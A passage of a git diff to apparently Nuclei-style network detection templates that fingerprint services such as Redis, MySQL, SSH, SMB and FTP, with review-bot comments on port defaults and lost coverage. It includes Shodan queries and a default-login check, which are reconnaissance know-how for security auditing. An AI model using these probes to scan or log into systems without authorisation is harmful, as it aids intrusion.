info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-284 - tags: network,ldap,default-login,tenable metadata: - max-request: 2 + max-request: 1 + tags: network,ldap,default-login,tenable tcp: - inputs: 
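Review bot: In ftp-weak-credentials.yaml the re-added line `cvss-metrics: 3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N` lacks the `CVSS:` prefix that the other templates in this commit carry; it should read `cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N`. The commit is already normalising the classification block here (field order, `cvss-score` placement), so this is the natural place to correct it. Tooling that validates the vector string may reject or skip the value as written, which would leave the finding without a usable severity vector.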
@@ -24,7 +24,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:389" + port: 389 read-size: 1024 matchers: diff --git a/network/detection/activemq-openwire-transport-detect.yaml b/network/detection/activemq-openwire-transport-detect.yaml index 1930969a7e..7502fb0322 100644 --- a/network/detection/activemq-openwire-transport-detect.yaml +++ b/network/detection/activemq-openwire-transport-detect.yaml @@ -7,9 +7,9 @@ info: description: | OpenWire is the native protocol that Apache ActiveMQ uses. It is designed for performance and size on the wire - sacrificing some ease of implementation with higher performance and reduced network bandwidth as a priority. metadata: - max-request: 2 + max-request: 1 + shodan-query: product:"ActiveMQ OpenWire transport" verified: true - shodan-query: 'product:"ActiveMQ OpenWire transport"' tags: network,activemq,detect tcp: @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:61616" + port: 61616 matchers-condition: and matchers: diff --git a/network/detection/apache-activemq-detect.yaml b/network/detection/apache-activemq-detect.yaml index e927ea96bf..82acb9b8a4 100644 --- a/network/detection/apache-activemq-detect.yaml +++ b/network/detection/apache-activemq-detect.yaml @@ -7,9 +7,9 @@ info: description: | Apache ActiveMQ is an open source message broker written in Java together with a full Java Message Service client. It provides "Enterprise Features" which in this case means fostering the communication from more than one client or server. metadata: - max-request: 2 + max-request: 1 + shodan-query: product:"Apache ActiveMQ" verified: true - shodan-query: 'product:"Apache ActiveMQ"' tags: network,activemq,oss,detect tcp: @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:61613" + port: 61613 matchers-condition: and matchers: diff --git a/network/detection/axigen-mail-server-detect.yaml b/network/detection/axigen-mail-server-detect.yaml index 8b6bc4df23..5c3bc6fa86 100644 
--- a/network/detection/axigen-mail-server-detect.yaml +++ b/network/detection/axigen-mail-server-detect.yaml @@ -7,10 +7,10 @@ info: description: | Axigen Mail Server was detected. metadata: - max-request: 2 - verified: true fofa-query: app="axigen-Mail-Server" + max-request: 1 shodan-query: product:"Axigen" + verified: true tags: network,axigen,detect tcp: @@ -19,7 +19,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:25" + port: 25 matchers: - type: word diff --git a/network/detection/cisco-finger-detect.yaml b/network/detection/cisco-finger-detect.yaml index 64366b18e5..f6a77f458d 100644 --- a/network/detection/cisco-finger-detect.yaml +++ b/network/detection/cisco-finger-detect.yaml @@ -7,9 +7,9 @@ info: description: | The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79. metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: product:"Cisco fingerd" + verified: true tags: network,finger,detect tcp: @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:79" + port: 79 matchers: - type: word diff --git a/network/detection/clamav-detect.yaml b/network/detection/clamav-detect.yaml index bdf57c43b8..dcd689a06e 100644 --- a/network/detection/clamav-detect.yaml +++ b/network/detection/clamav-detect.yaml @@ -7,9 +7,9 @@ info: description: | Clam AntiVirus is a free software, cross-platform antimalware toolkit able to detect many types of malware, including viruses. metadata: - max-request: 2 + max-request: 1 + shodan-query: port:3310 product:"ClamAV" verified: true - shodan-query: 'port:3310 product:"ClamAV"' tags: network,clamav,detect tcp: @@ -17,7 +17,7 @@ tcp: - data: "VERSION" host: - "{{Hostname}}" - - "{{Host}}:3310" + port: 3310 matchers: - type: regex diff --git a/network/detection/cql-native-transport.yaml b/network/detection/cql-native-transport.yaml index 0da40bade4..0f5429b67a 100644 --- a/network/detection/cql-native-transport.yaml 
+++ b/network/detection/cql-native-transport.yaml @@ -7,9 +7,9 @@ info: description: | Native transport requests (NTR) are any requests made via the CQL Native Protocol. CQL Native Protocol is the way the Cassandra driver communicates with the server. metadata: - max-request: 2 + max-request: 1 + shodan-query: cassandra verified: true - shodan-query: "cassandra" tags: network,cassandra,cql,detect tcp: @@ -25,7 +25,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:9042" + port: 9042 matchers: - type: word diff --git a/network/detection/detect-addpac-voip-gateway.yaml b/network/detection/detect-addpac-voip-gateway.yaml index a74286909d..250e4812b5 100644 --- a/network/detection/detect-addpac-voip-gateway.yaml +++ b/network/detection/detect-addpac-voip-gateway.yaml @@ -10,11 +10,10 @@ info: - http://www.addpac.com/addpac_eng2/down.php?file=505_f16.pdf classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 - tags: network,addpac,apos,voip,detect metadata: - max-request: 2 + max-request: 1 + tags: network,addpac,apos,voip,detect tcp: - inputs: @@ -23,7 +22,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:23" + port: 23 matchers: - type: word diff --git a/network/detection/detect-jabber-xmpp.yaml b/network/detection/detect-jabber-xmpp.yaml index 42639efe65..924315c66d 100644 --- a/network/detection/detect-jabber-xmpp.yaml +++ b/network/detection/detect-jabber-xmpp.yaml @@ -9,11 +9,10 @@ info: - https://datatracker.ietf.org/doc/html/rfc6120 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 - tags: network,jabber,xmpp,messaging,detect metadata: - max-request: 2 + max-request: 1 + tags: network,jabber,xmpp,messaging,detect tcp: - inputs: @@ -21,7 +20,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:5222" + port: 5222 matchers: - type: word 
diff --git a/network/detection/dotnet-remoting-service-detect.yaml b/network/detection/dotnet-remoting-service-detect.yaml index 0e6810cbba..4183336714 100644 --- a/network/detection/dotnet-remoting-service-detect.yaml +++ b/network/detection/dotnet-remoting-service-detect.yaml @@ -8,12 +8,11 @@ info: Microsoft .NET Remoting httpd was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: product:"MS .NET Remoting httpd" + verified: true tags: network,detect,microsoft tcp: @@ -22,7 +21,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:8080" + port: 8080 matchers-condition: and matchers: diff --git a/network/detection/dropbear-cbc-ciphers.yaml b/network/detection/dropbear-cbc-ciphers.yaml index c361c0f2d1..2e640b11b8 100644 --- a/network/detection/dropbear-cbc-ciphers.yaml +++ b/network/detection/dropbear-cbc-ciphers.yaml @@ -6,14 +6,14 @@ info: severity: low description: | The SSH server is configured to support Cipher Block Chaining (CBC) encryption. This may allow an attacker to recover the plaintext message from the ciphertext. - remediation: | - Disable CBC Ciphers. reference: | https://www.tenable.com/plugins/nessus/70658 + remediation: | + Disable CBC Ciphers. metadata: - max-request: 2 + max-request: 1 + shodan-query: product:"Dropbear sshd" verified: true - shodan-query: 'product:"Dropbear sshd"' tags: network,ssh,dropbear,detect tcp: @@ -22,7 +22,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:22" + port: 22 matchers: - type: word diff --git a/network/detection/esmtp-detect.yaml b/network/detection/esmtp-detect.yaml index 72b2dab40c..1f248170ee 100644 --- a/network/detection/esmtp-detect.yaml +++ b/network/detection/esmtp-detect.yaml 
@@ -10,12 +10,11 @@ info: - https://nmap.org/nsedoc/scripts/smtp-open-relay.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 + max-request: 1 + shodan-query: ESMTP verified: true - shodan-query: 'ESMTP' tags: network,detect,smtp,mail tcp: @@ -24,7 +23,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:25" + port: 25 matchers-condition: and matchers: diff --git a/network/detection/expn-mail-detect.yaml b/network/detection/expn-mail-detect.yaml index 6b1525f20b..ed7c818097 100644 --- a/network/detection/expn-mail-detect.yaml +++ b/network/detection/expn-mail-detect.yaml @@ -6,9 +6,9 @@ info: severity: info description: | The "EXPN" can be used by attackers to learn about valid usernames on the target system. On some SMTP servers, EXPN can be used to show the subscribers of a mailing list subscription lists are generally considered to be sensitive information. - tags: mail,expn,network,detect metadata: - max-request: 2 + max-request: 1 + tags: mail,expn,network,detect tcp: - inputs: @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:25" + port: 25 matchers: - type: word diff --git a/network/detection/finger-detect.yaml b/network/detection/finger-detect.yaml index 0080ce646e..4384319476 100644 --- a/network/detection/finger-detect.yaml +++ b/network/detection/finger-detect.yaml @@ -7,9 +7,9 @@ info: description: | The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79. metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: port:"79" action + verified: true tags: network,finger,detect tcp: @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:79" + port: 79 matchers: - type: word diff --git a/network/detection/gnu-inetutils-ftpd-detect.yaml b/network/detection/gnu-inetutils-ftpd-detect.yaml index 7731e2db8a..b4f560c0ad 100644 --- a/network/detection/gnu-inetutils-ftpd-detect.yaml 
+++ b/network/detection/gnu-inetutils-ftpd-detect.yaml @@ -7,9 +7,9 @@ info: description: | The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. metadata: - max-request: 2 + max-request: 1 + shodan-query: product:"GNU Inetutils FTPd" verified: true - shodan-query: 'product:"GNU Inetutils FTPd"' tags: network,ftp,smartgateway,gnu,inetutils,detect tcp: @@ -17,8 +17,7 @@ tcp: - data: "\n" host: - "{{Hostname}}" - - "{{Host}}:21" - + port: 21 matchers: - type: word words: diff --git a/network/detection/gopher-detect.yaml b/network/detection/gopher-detect.yaml index d2d8621175..789954f457 100644 --- a/network/detection/gopher-detect.yaml +++ b/network/detection/gopher-detect.yaml @@ -8,18 +8,17 @@ info: Gopher service was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 - tags: network,gopher,detect metadata: - max-request: 2 + max-request: 1 + tags: network,gopher,detect tcp: - inputs: - data: "\r\n" host: - "{{Hostname}}" - - "{{Host}}:70" + port: 70 matchers: - type: dsl diff --git a/network/detection/ibm-d2b-database-server.yaml b/network/detection/ibm-d2b-database-server.yaml index 868d874ac2..2fb08c0ca6 100644 --- a/network/detection/ibm-d2b-database-server.yaml +++ b/network/detection/ibm-d2b-database-server.yaml @@ -10,12 +10,11 @@ info: - https://nmap.org/nsedoc/scripts/db2-das-info.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: product:"IBM DB2 Database Server" + verified: true tags: network,ibm,database,db,db2,detect tcp: @@ -25,7 +24,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:50000" + port: 50000 matchers-condition: and matchers: diff --git a/network/detection/imap-detect.yaml b/network/detection/imap-detect.yaml index d3285206ca..f148865b90 100644 
--- a/network/detection/imap-detect.yaml +++ b/network/detection/imap-detect.yaml @@ -8,12 +8,11 @@ info: IMAP was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 + max-request: 1 + shodan-query: imap verified: true - shodan-query: 'imap' tags: network,detect,imap,mail tcp: @@ -22,7 +21,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:143" + port: 143 matchers-condition: and matchers: diff --git a/network/detection/iplanet-imap-detect.yaml b/network/detection/iplanet-imap-detect.yaml index d0c95983ae..37ddd8519e 100644 --- a/network/detection/iplanet-imap-detect.yaml +++ b/network/detection/iplanet-imap-detect.yaml @@ -8,11 +8,10 @@ info: iPlanet Messaging Server IMAP protocol was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 fofa-query: app="iPlanet-Messaging-Server-5.2" && protocol="imap" + max-request: 1 tags: network,imap,detect tcp: @@ -20,7 +19,7 @@ tcp: - data: "\n" host: - "{{Hostname}}" - - "{{Host}}:110" + port: 110 matchers: - type: word diff --git a/network/detection/microsoft-ftp-service.yaml b/network/detection/microsoft-ftp-service.yaml index ba87bbdfad..577a884721 100644 --- a/network/detection/microsoft-ftp-service.yaml +++ b/network/detection/microsoft-ftp-service.yaml @@ -7,9 +7,9 @@ info: description: | The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. metadata: - max-request: 2 + max-request: 1 + shodan-query: Microsoft FTP Service verified: true - shodan-query: "Microsoft FTP Service" tags: network,ftp,microsoft,detect tcp: @@ -18,7 +18,7 @@ tcp: - data: "\n" host: - "{{Hostname}}" - - "{{Host}}:21" + port: 21 matchers: - type: word 
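Review bot: In the `iplanet-imap-detect.yaml` hunk the new `port: 110` carries over the old `{{Host}}:110` default, but 110 is the registered POP3 port, while the template's description and its `fofa-query` (`protocol="imap"`) both say IMAP. If the banner matcher, which lies outside the hunk, is meant to see the IMAP greeting, the default should be `port: 143`, as in the `imap-detect.yaml` hunk just before it. If the POP3 banner is what is actually matched, a one-line comment such as `# iPlanet banner is read from the POP3 listener` would stop the next reader from "fixing" it. I cannot confirm the intent from the visible lines.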
diff --git a/network/detection/mikrotik-ftp-server-detect.yaml b/network/detection/mikrotik-ftp-server-detect.yaml index 6c54ea1f55..5eddbb1f40 100644 --- a/network/detection/mikrotik-ftp-server-detect.yaml +++ b/network/detection/mikrotik-ftp-server-detect.yaml @@ -7,9 +7,9 @@ info: description: | The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. metadata: - max-request: 2 + max-request: 1 + shodan-query: product:"MikroTik router ftpd" verified: true - shodan-query: 'product:"MikroTik router ftpd"' tags: network,ftp,mikrotik,router,detect tcp: @@ -17,7 +17,7 @@ tcp: - data: "\n" host: - "{{Hostname}}" - - "{{Host}}:21" + port: 21 matchers: - type: word diff --git a/network/detection/mikrotik-routeros-api.yaml b/network/detection/mikrotik-routeros-api.yaml index 73c3ccdfee..1c07c6a24b 100644 --- a/network/detection/mikrotik-routeros-api.yaml +++ b/network/detection/mikrotik-routeros-api.yaml @@ -8,12 +8,11 @@ info: MikroTik RouterOS API was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: product:"MikroTik RouterOS API Service" + verified: true tags: network,mikrotik,detect tcp: @@ -23,7 +22,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:8728" + port: 8728 matchers: - type: word diff --git a/network/detection/mongodb-detect.yaml b/network/detection/mongodb-detect.yaml index 731a52674c..8b89e6e4da 100644 --- a/network/detection/mongodb-detect.yaml +++ b/network/detection/mongodb-detect.yaml 
@@ -6,15 +6,14 @@ info: severity: info description: | MongoDB service was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://github.com/orleven/Tentacle - tags: network,mongodb,detect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 metadata: - max-request: 2 + max-request: 1 + tags: network,mongodb,detect tcp: - inputs: @@ -23,7 +22,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:27017" + port: 27017 read-size: 2048 matchers: diff --git a/network/detection/msmq-detect.yaml b/network/detection/msmq-detect.yaml index 619301c3cb..0429cdbb09 100644 --- a/network/detection/msmq-detect.yaml +++ b/network/detection/msmq-detect.yaml @@ -11,10 +11,10 @@ info: - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/50da7ea1-eed7-41f9-ba6a-2aa37f5f1e92 - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554 metadata: - max-request: 2 - verified: true - shodan-query: MSMQ censys-query: services.service_name:MSMQ + max-request: 1 + shodan-query: MSMQ + verified: true tags: network,msmq,detect tcp: @@ -24,8 +24,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:1801" - + port: 1801 read-size: 2048 matchers: diff --git a/network/detection/mysql-detect.yaml b/network/detection/mysql-detect.yaml index f30568179c..8319e00b54 100644 --- a/network/detection/mysql-detect.yaml +++ b/network/detection/mysql-detect.yaml @@ -8,12 +8,11 @@ info: MySQL instance was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: product:"MySQL" + verified: true tags: network,mysql,db,detect tcp: @@ -22,7 +21,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:3306" + port: 3306 matchers: - type: word 
diff --git a/network/detection/openssh-detect.yaml b/network/detection/openssh-detect.yaml index 68cd4ad687..4d71cedb67 100644 --- a/network/detection/openssh-detect.yaml +++ b/network/detection/openssh-detect.yaml @@ -6,24 +6,23 @@ info: severity: info description: | OpenSSH service was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - http://www.openwall.com/lists/oss-security/2016/08/01/2 - http://www.openwall.com/lists/oss-security/2018/08/15/5 - http://seclists.org/fulldisclosure/2016/Jul/51 - https://nvd.nist.gov/vuln/detail/CVE-2016-6210 - https://nvd.nist.gov/vuln/detail/CVE-2018-15473 - tags: seclists,network,ssh,openssh,detect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 metadata: - max-request: 2 + max-request: 1 + tags: seclists,network,ssh,openssh,detect tcp: - host: - "{{Hostname}}" - - "{{Host}}:22" + port: 22 matchers: - type: regex diff --git a/network/detection/pgsql-detect.yaml b/network/detection/pgsql-detect.yaml index 28cd603ce5..91f8054806 100644 --- a/network/detection/pgsql-detect.yaml +++ b/network/detection/pgsql-detect.yaml @@ -11,12 +11,11 @@ info: - https://www.postgresql.org/docs/current/client-authentication-problems.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: port:5432 product:"PostgreSQL" + verified: true tags: network,postgresql,db,detect tcp: @@ -28,7 +27,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:5432" + port: 5432 read-size: 2048 matchers-condition: and diff --git a/network/detection/pop3-detect.yaml b/network/detection/pop3-detect.yaml index d38ba3ffc8..fc6a17a996 100644 --- a/network/detection/pop3-detect.yaml +++ b/network/detection/pop3-detect.yaml 
@@ -10,12 +10,11 @@ info: - https://nmap.org/nsedoc/scripts/pop3-ntlm-info.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 + max-request: 1 + shodan-query: pop3 port:110 verified: true - shodan-query: 'pop3 port:110' tags: network,detect,pop3,mail tcp: @@ -24,7 +23,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:110" + port: 110 matchers: - type: word diff --git a/network/detection/proftpd-server-detect.yaml b/network/detection/proftpd-server-detect.yaml index df5df5d2da..d916b8d423 100644 --- a/network/detection/proftpd-server-detect.yaml +++ b/network/detection/proftpd-server-detect.yaml @@ -7,9 +7,9 @@ info: description: | The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. metadata: - max-request: 2 + max-request: 1 + shodan-query: product:"ProFTPD" verified: true - shodan-query: 'product:"ProFTPD"' tags: network,ftp,proftpd,detect tcp: @@ -17,7 +17,7 @@ tcp: - data: "\n" host: - "{{Hostname}}" - - "{{Host}}:21" + port: 21 matchers: - type: word diff --git a/network/detection/rabbitmq-detect.yaml b/network/detection/rabbitmq-detect.yaml index 8ccf9cecaa..5b8f10167c 100644 --- a/network/detection/rabbitmq-detect.yaml +++ b/network/detection/rabbitmq-detect.yaml @@ -9,9 +9,9 @@ info: reference: - https://nmap.org/nsedoc/scripts/amqp-info.html metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: product:"RabbitMQ" + verified: true tags: network,rabbitmq,oss,detect tcp: @@ -20,7 +20,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:5672" + port: 5672 matchers-condition: and matchers: diff --git a/network/detection/rdp-detect.yaml b/network/detection/rdp-detect.yaml index 21a817a040..635ac81a3a 100644 --- a/network/detection/rdp-detect.yaml +++ b/network/detection/rdp-detect.yaml 
@@ -8,10 +8,9 @@ info: Windows Remote Desktop Protocol was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 + max-request: 1 verified: true tags: network,windows,rdp,detect @@ -22,8 +21,8 @@ tcp: read-size: 2048 host: - - "{{Host}}:3389" - "{{Hostname}}" + port: 3389 matchers: - type: word diff --git a/network/detection/redis-detect.yaml b/network/detection/redis-detect.yaml index 9f1431ef6a..4a70dfdd40 100644 --- a/network/detection/redis-detect.yaml +++ b/network/detection/redis-detect.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 4 + max-request: 1 shodan-query: product:"redis" verified: true tags: network,redis,detect @@ -19,10 +19,8 @@ tcp: - data: "*1\r\n$4\r\ninfo\r\n" host: - - "{{Hostname}}" - - "{{Host}}:6379" - - "tls://{Hostname}}" - - "tls://{{Host}}:6380" + - "tls://{{Host}}" + port: 6380 read-size: 1024 matchers: diff --git a/network/detection/riak-detect.yaml b/network/detection/riak-detect.yaml index e52868d902..bc0315d527 100644 --- a/network/detection/riak-detect.yaml +++ b/network/detection/riak-detect.yaml @@ -6,9 +6,9 @@ info: severity: info description: Riak is a distributed NoSQL key-value data store that offers high availability, fault tolerance, operational simplicity, and scalability. metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: product:"Riak" + verified: true tags: network,oss,detect tcp: @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:8087" + port: 8087 read-size: 2048 matchers: diff --git a/network/detection/rpcbind-portmapper-detect.yaml b/network/detection/rpcbind-portmapper-detect.yaml index d8fa9166c5..02e9ef6520 100644 --- a/network/detection/rpcbind-portmapper-detect.yaml +++ b/network/detection/rpcbind-portmapper-detect.yaml 
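Review bot: The second `redis-detect.yaml` hunk reduces the host list to `- "tls://{{Host}}"` with `port: 6380`, so the plaintext probes (`{{Hostname}}` and `{{Host}}:6379`) are gone and a Redis instance on its default non-TLS port is no longer probed by default. For a detection template that is a coverage regression, and it will show up as a silent drop in findings rather than as an error. The same removal is made in `network/exposures/exposed-redis.yaml`, where unauthenticated plaintext Redis is the main case the template exists to report. I would keep a plaintext request next to the TLS one, for example a second `tcp` entry with `- "{{Hostname}}"` and `port: 6379`, and set `max-request` to match the number of requests actually sent.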
@@ -8,12 +8,11 @@ info: reference: https://book.hacktricks.xyz/pentesting/pentesting-rpcbind classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: port:"111" + verified: true tags: network,rpcbind,portmap,detect tcp: @@ -23,7 +22,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:111" + port: 111 matchers: - type: word diff --git a/network/detection/rsyncd-service-detect.yaml b/network/detection/rsyncd-service-detect.yaml index cf8d848e1a..121d709d18 100644 --- a/network/detection/rsyncd-service-detect.yaml +++ b/network/detection/rsyncd-service-detect.yaml @@ -10,11 +10,10 @@ info: - https://linux.die.net/man/1/rsync classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 - tags: network,rsyncd,detect metadata: - max-request: 2 + max-request: 1 + tags: network,rsyncd,detect tcp: - inputs: @@ -22,7 +21,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:873" + port: 873 matchers: - type: word diff --git a/network/detection/rtsp-detect.yaml b/network/detection/rtsp-detect.yaml index b9beed2b9d..1aa38c37f7 100644 --- a/network/detection/rtsp-detect.yaml +++ b/network/detection/rtsp-detect.yaml @@ -10,12 +10,11 @@ info: https://nmap.org/nsedoc/scripts/rtsp-methods.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: RTSP/1.0 + verified: true tags: network,rtsp,detect tcp: @@ -25,7 +24,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:554" + port: 554 read-size: 1024 matchers: diff --git a/network/detection/samba-detect.yaml b/network/detection/samba-detect.yaml index cc20db7a91..5c2f94fa7b 100644 --- a/network/detection/samba-detect.yaml +++ b/network/detection/samba-detect.yaml 
@@ -8,12 +8,12 @@ info: reference: - https://www.samba.org/samba/what_is_samba.html - https://www.samba.org/samba/history/security.html + remediation: Always apply the latest security patch. classification: cwe-id: CWE-200 - remediation: Always apply the latest security patch. - tags: network,smb,samba,detect metadata: - max-request: 2 + max-request: 1 + tags: network,smb,samba,detect tcp: - inputs: @@ -21,8 +21,7 @@ tcp: type: hex host: - "{{Hostname}}" - - "{{Host}}:139" - + port: 139 matchers-condition: and matchers: - type: word diff --git a/network/detection/sap-router.yaml b/network/detection/sap-router.yaml index b7cf6ff735..482076acb8 100644 --- a/network/detection/sap-router.yaml +++ b/network/detection/sap-router.yaml @@ -4,11 +4,11 @@ info: name: SAPRouter Detection author: randomstr1ng severity: info - tags: network,sap,detect description: | SAProuter is a software application that provides a remote connection between our customer's network and SAP. metadata: - max-request: 2 + max-request: 1 + tags: network,sap,detect tcp: - inputs: @@ -17,7 +17,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:3299" + port: 3299 read-size: 1024 matchers: diff --git a/network/detection/smb-detect.yaml b/network/detection/smb-detect.yaml index 038dc22d2e..136bcb5dd2 100644 --- a/network/detection/smb-detect.yaml +++ b/network/detection/smb-detect.yaml @@ -4,11 +4,11 @@ info: name: SMB Detection author: pussycat0x severity: low - tags: network,windows,smb,service,detect description: | SMB (Server Message Block) is a network-layered protocol mainly used on Windows for sharing files, printers, and communication between network-attached computers. SMB related vulnerabilities can be levaraged to compromise large-scale systems. metadata: - max-request: 2 + max-request: 1 + tags: network,windows,smb,service,detect tcp: - inputs: @@ -17,7 +17,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:445" + port: 445 matchers: - type: word 
diff --git a/network/detection/smtp-detect.yaml b/network/detection/smtp-detect.yaml index d63b816e07..c1f47429d5 100644 --- a/network/detection/smtp-detect.yaml +++ b/network/detection/smtp-detect.yaml @@ -4,18 +4,19 @@ info: name: SMTP Service Detection author: pussycat0x severity: info - tags: network,service,smtp,detect description: | SMTP is part of the application layer of the TCP/IP protocol. Using a process called “store and forward,” SMTP moves your email on and across networks. metadata: - max-request: 2 + max-request: 1 + tags: network,service,smtp,detect tcp: - inputs: - data: "\r\n" host: - "{{Hostname}}" - - "{{Host}}:25" + port: 25 + matchers: - type: word words: diff --git a/network/detection/sshd-dropbear-detect.yaml b/network/detection/sshd-dropbear-detect.yaml index 96f5143603..fbe7736c56 100644 --- a/network/detection/sshd-dropbear-detect.yaml +++ b/network/detection/sshd-dropbear-detect.yaml @@ -7,9 +7,9 @@ info: description: | Dropbear is a software package written by Matt Johnston that provides a Secure Shell-compatible server and client. It is designed as a replacement for standard OpenSSH for environments with low memory and processor resources, such as embedded systems metadata: - max-request: 2 + max-request: 1 + shodan-query: product:"Dropbear sshd" verified: true - shodan-query: 'product:"Dropbear sshd"' tags: network,ssh,dropbear,detect tcp: @@ -18,7 +18,7 @@ tcp: - data: "\n" host: - "{{Hostname}}" - - "{{Host}}:22" + port: 22 matchers: - type: word diff --git a/network/detection/starttls-mail-detect.yaml b/network/detection/starttls-mail-detect.yaml index 2970b2d555..2795600fde 100644 --- a/network/detection/starttls-mail-detect.yaml +++ b/network/detection/starttls-mail-detect.yaml 
